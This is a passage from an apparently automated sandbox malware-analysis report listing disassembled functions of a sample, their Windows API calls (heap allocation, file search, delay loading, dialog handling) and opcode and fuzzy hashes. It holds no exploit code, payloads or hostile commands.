                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: a010df36d299a2d9e0ec0a7ea5f7fe8ca2db21f42f3ab9eff55d05d90c3e1999
                                                                                  • Instruction ID: 7207b47f9413dd27b7cc55204f56d71df306a02612bd466fa40e248c4680b691
                                                                                  • Opcode Fuzzy Hash: a010df36d299a2d9e0ec0a7ea5f7fe8ca2db21f42f3ab9eff55d05d90c3e1999
                                                                                  • Instruction Fuzzy Hash: 27112933A20326AF9F26DE28EC4485AB395EB853207164221FC15EF254DB30DC2287E2
                                                                                  Function 00279215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 905f94f808ef654fb870365970ad78518ccfeac0cb5cb6a291046aa65f200fda
                                                                                  • Instruction ID: efd71df30238ba059b3ddc05b1c01e75802eb812b7d984fded85b39b70b3effc
                                                                                  • Opcode Fuzzy Hash: 905f94f808ef654fb870365970ad78518ccfeac0cb5cb6a291046aa65f200fda
                                                                                  • Instruction Fuzzy Hash: 4D015633920535ABCF12BF68CC529DEB735AF88750B018565E819B7152DA358D648AA0
                                                                                  Function 0029C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0029B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00299813,00000001,00000364,?,002940EF,?,?,002B1098), ref: 0029B177
                                                                                  • _free.LIBCMT ref: 0029C4E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                  • Instruction ID: bf648418813dcca7d3a78318fd4ad8e075f5065e95ce169272abff9687cf346e
                                                                                  • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                  • Instruction Fuzzy Hash: 3E01F9722103066BEB358F65D88596AFBEDFB85370F35051DE598832C1EA30A905CB74
                                                                                  Function 0029B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00299813,00000001,00000364,?,002940EF,?,?,002B1098), ref: 0029B177
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 55daa7719e4c8d734625d9718f211e0f01a073d0d2d43fb525d2f506f4e61cf9
                                                                                  • Instruction ID: 6d4d01b8daed5014e763371be0fff067b090ff5086fa2823655ac900d5a8e0a2
                                                                                  • Opcode Fuzzy Hash: 55daa7719e4c8d734625d9718f211e0f01a073d0d2d43fb525d2f506f4e61cf9
                                                                                  • Instruction Fuzzy Hash: B2F05432535126B7DF265E75BE19B9E7748AB41770B188112BC0C96190DB60DD2186E0
                                                                                  Function 00293C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00293C3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: cc8f8cb2119574d85fc0b3cb53bfc8eccf1a389ea9fc966facc1403c09911232
                                                                                  • Instruction ID: 7e8bd01330647348d698f9b7eaff4272a57d005aa60fee575986bbcd38a1efc6
                                                                                  • Opcode Fuzzy Hash: cc8f8cb2119574d85fc0b3cb53bfc8eccf1a389ea9fc966facc1403c09911232
                                                                                  • Instruction Fuzzy Hash: 23F0E5332246179FCF11CEA8FC0899A77A9EF11B317104126FA09E7190DB31DA30CB90
                                                                                  Function 00298E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: b92811fb7d295fadf43b3c3f686241b0ea545f15e6c675215f224f835f4107c1
                                                                                  • Instruction ID: 32c2f5ad64fc1c51647f6e5017beb1bc94170a08157348462ff70627a8b27882
                                                                                  • Opcode Fuzzy Hash: b92811fb7d295fadf43b3c3f686241b0ea545f15e6c675215f224f835f4107c1
                                                                                  • Instruction Fuzzy Hash: 32E0653163621657EE712E759C19B9F76489B477B4F1D0112BC9C96091DF60CC2085E1
                                                                                  Function 00275ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00275AC2
                                                                                    • Part of subcall function 0027B505: __EH_prolog.LIBCMT ref: 0027B50A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 90e8449fafe4d89cba5fb9e0d74170c7d3d4a7a4f4b723576c4fda00c7d9bf6d
                                                                                  • Instruction ID: 63233f837625c9015efa028390878a575625376fd4c195c4ad9dbeeb21aca9e1
                                                                                  • Opcode Fuzzy Hash: 90e8449fafe4d89cba5fb9e0d74170c7d3d4a7a4f4b723576c4fda00c7d9bf6d
                                                                                  • Instruction Fuzzy Hash: 6301D1345226A0CAD715F7B8C0817DDF7A89F14308F55808DA46A132C2DBB01B28DBA2
                                                                                  Function 0027A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0027A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6C4
                                                                                    • Part of subcall function 0027A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6F2
                                                                                    • Part of subcall function 0027A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6FE
                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A598
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1464966427-0
                                                                                  • Opcode ID: c48a956fb6ae6232afc05638d978121ac387cdbe0842ebf9608b4041b47eafa4
                                                                                  • Instruction ID: 4b4d8935644137b04aca5b6d5e2149b8640125bf7436154946d74d0b933073c4
                                                                                  • Opcode Fuzzy Hash: c48a956fb6ae6232afc05638d978121ac387cdbe0842ebf9608b4041b47eafa4
                                                                                  • Instruction Fuzzy Hash: B3F08232429791ABCB225BB48905BCFBB906F9A331F04CA4DF5FD52196C3B550A49F23
                                                                                  Function 00280E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00280E3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecutionStateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2211380416-0
                                                                                  • Opcode ID: 018f752ffc73e3ce974b5cce44007998f2bd8cf4707126965fb932f0d8bb760a
                                                                                  • Instruction ID: 8df3dec5436cf0f08284c4feee7f50a8b55a71a0a4413a48847da3de84a300f0
                                                                                  • Opcode Fuzzy Hash: 018f752ffc73e3ce974b5cce44007998f2bd8cf4707126965fb932f0d8bb760a
                                                                                  • Instruction Fuzzy Hash: 74D0C20463209516DA223729286D7FF350A8FD6310F0D042AB549571C2CE5448B6A762
                                                                                  Function 0028A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0028A62C
                                                                                    • Part of subcall function 0028A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028A3DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                  • String ID:
                                                                                  • API String ID: 1915507550-0
                                                                                  • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                  • Instruction ID: 8fa1ff20088c9e56156fa68b068a26cf03e719d4a801e4204cd70098951e419e
                                                                                  • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                  • Instruction Fuzzy Hash: 5DD0C979233609BAEF427F618C12A6E7A99FB00354F04C126B842D51D5FEB1D930AB62
                                                                                  Function 0028DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00281B3E), ref: 0028DD92
                                                                                    • Part of subcall function 0028B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                    • Part of subcall function 0028B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                    • Part of subcall function 0028B568: IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                    • Part of subcall function 0028B568: TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                    • Part of subcall function 0028B568: DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 897784432-0
                                                                                  • Opcode ID: 4c6d1b711efc0da0ef52a26d012adb9bb8e59bf08f1bcf70d12f3a374923004f
                                                                                  • Instruction ID: 06f7e01fd128edbeccc6c1f997b6e4d84bc68181a8b1d4116776dcced40f471c
                                                                                  • Opcode Fuzzy Hash: 4c6d1b711efc0da0ef52a26d012adb9bb8e59bf08f1bcf70d12f3a374923004f
                                                                                  • Instruction Fuzzy Hash: DDD09E36155300BAD6027B51DD0AF0A7BE6AB88B04F404555B288740F286729D31DF12
                                                                                  Function 0028E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DloadProtectSection.DELAYIMP ref: 0028E5E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DloadProtectSection
                                                                                  • String ID:
                                                                                  • API String ID: 2203082970-0
                                                                                  • Opcode ID: d9cc50d56c327b9c93821fc3d3089b31cc59005057f30c7f066130f38fb2c1c7
                                                                                  • Instruction ID: 5684f19890b9ad72a3b4382bae1e8a549c0a378933135474ef15e91bb6162c7d
                                                                                  • Opcode Fuzzy Hash: d9cc50d56c327b9c93821fc3d3089b31cc59005057f30c7f066130f38fb2c1c7
                                                                                  • Instruction Fuzzy Hash: 59D0C7B85B21516BDE11FF54788971533547715704FD50113B155919E5DB6448708B06
                                                                                  Function 002798BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNELBASE(000000FF,002797BE), ref: 002798C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: b879fb8b52e5bf2ce997c082a7917156d98eeeb54f19035ddc73585ce011f076
                                                                                  • Instruction ID: a460616f054f280ab0024093574d291f868b517161d5d318b24122033ceb4c64
                                                                                  • Opcode Fuzzy Hash: b879fb8b52e5bf2ce997c082a7917156d98eeeb54f19035ddc73585ce011f076
                                                                                  • Instruction Fuzzy Hash: F0C00234416306968E219E29A8490A97722AE533A67B4D7D4D06D890A1C732CCE7EA12
                                                                                  Function 0028E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: e65cc146b691c01702eb051b20dc53fd8198d67a672392e3489ff074f1cc82a0
                                                                                  • Instruction ID: 8767317088aa8827ab0f4f534fe54460046a27b5a91ea4b9abfda59ccc85fc29
                                                                                  • Opcode Fuzzy Hash: e65cc146b691c01702eb051b20dc53fd8198d67a672392e3489ff074f1cc82a0
                                                                                  • Instruction Fuzzy Hash: F8B092A927A000BD2604E2045802C3A020DC0C2F21331802AB804D15C0D8804E200A33
                                                                                  Function 0028E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: 1d3008bea9f8e103484ce55f1a476e3dd5e8720415e8bf29de96d6ba47ad9cc3
                                                                                  • Instruction ID: 75c04d6a6690d4c603ab80365182e9934898744ea86b4dddd47502aa4883df71
                                                                                  • Opcode Fuzzy Hash: 1d3008bea9f8e103484ce55f1a476e3dd5e8720415e8bf29de96d6ba47ad9cc3
                                                                                  • Instruction Fuzzy Hash: 0BB092AA27A0006D2504A2045902C3A020DC0C2B21331C02AB504D15C098800C290A33
                                                                                  Function 0028E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
